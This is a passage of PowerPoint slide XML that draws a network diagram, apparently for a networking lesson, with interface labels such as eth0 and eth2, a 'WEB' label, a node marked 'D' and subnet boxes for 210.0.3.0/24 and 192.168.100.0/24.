                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B676A95C-8C79-C516-3766-8FFA3D942021}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4373293-0245-6933-B19B-5731A1A1269A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="670333"/>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319" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761B5773-60A2-C219-9C90-5E8EBBAB2793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83BD45B8-4095-A029-BCAD-838CC2288EAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7365298-B5E2-7328-D9FE-4DAF692D7934}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A517E6-55D2-CE18-FD06-7F5886A23D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC71D0C-A32F-2CE3-F875-D58D88D94529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCBE8FF-5833-1236-832A-4C81B93A9DB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E960DB1F-1B4A-98F8-C3F5-E12F5F7CCDCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDAA901-6F2E-890C-44B3-3DDCA11941C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="1187467"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7754F259-A1D9-955B-F397-6AC93FEFE41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78994F8A-BFFF-05FB-211B-5253E1605B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0B4974-C0B9-354E-86B8-C93107C15215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B83EC76-561E-0992-5139-DCA34C135C14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9223" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BBA40B-7057-CD64-1D1D-8BF473E6D842}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
